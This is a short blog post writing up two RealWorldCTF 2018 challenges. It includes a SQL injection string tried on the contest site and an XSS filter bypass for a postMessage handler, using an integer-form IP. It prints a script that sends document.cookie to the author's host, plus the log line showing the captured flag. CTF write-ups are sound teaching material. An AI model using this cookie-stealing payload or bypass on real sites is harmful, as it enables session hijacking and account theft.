NiNi's Den

2018::RealWorldCTF::Qual

Word count: 426Reading time: 2 min
2018/07/30

RealWorld CTF is very interesting and that is the hardest check-in challenge I’ve ever saw.

Advertisement

This challenge gave nothing, but just one line

This platform is under protection. DO NOT hack it.

Trying not to hack the web, but I can’t find anything.
I did find something interesting, like this one:

It seems to use WebSocket to get some information then render it on template view.
So, let’s change the hash-like string on url.

When url is https://realworldctf.com/contest/5

When url is https://realworldctf.com/contest/5b5bc8c532a7ca004d2d0f64 (Make the length of hash-like string consist with origin)

Did you say Database?
https://realworldctf.com/contest/' or '1'='1' --

My teamate kaibro told me that chaitin has sqlchop product…. ohh…. advertisement… got it
It took me half day to find the flag

Dot Free

There are some js functoin on web page:

function lls(src) {
var el = document.createElement('script');
if (el) {
el.setAttribute('type', 'text/javascript');
el.src = src;
document.body.appendChild(el);
}
};

function lce(doc, def, parent) {
// ...
};
window.addEventListener('message', function (e) {
if (e.data.iframe) {
if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) {
if (e.data.iframe.type == "iframe") {
lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent);
} else {
lls(e.data.iframe.value)
}
}
}
}, false);
window.onload = function (ev) {
postMessage(JSON.parse(decodeURIComponent(location.search.substr(1))), '*')
}

And I found some keyword like login passwd,login account in css, so I think that we can try to XSS.

We append string to url, the xxxxxxxx part sould replaced by ip in integer form:
http://13.57.104.34/?{"iframe":{"value":"http:\\\\xxxxxxxx"}}

And put a javascript on your machine:
document.location="http:\\\\my.ip.put.here/a?cookie="+document.cookie;

Then go to apache log to get the flag:
13.57.104.34 - - [29/Jul/2018:14:36:15 +0000] "GET /a?cookie=flag=rwctf%7BL00kI5TheFlo9%7D HTTP/1.1" 404 496

Author:NiNi

Link:http://blog.terrynini.tw/en/2018-RealWorldCTF-Qual/

Publish date:July 30th 2018, 2:11:03 pm

Update date:June 21st 2024, 1:46:00 am

License:This article is licensed under CC BY-NC 4.0

avatar
Terrynini
逆逆逆逆
CATALOG
  1. 1. Advertisement
  2. 2. Dot Free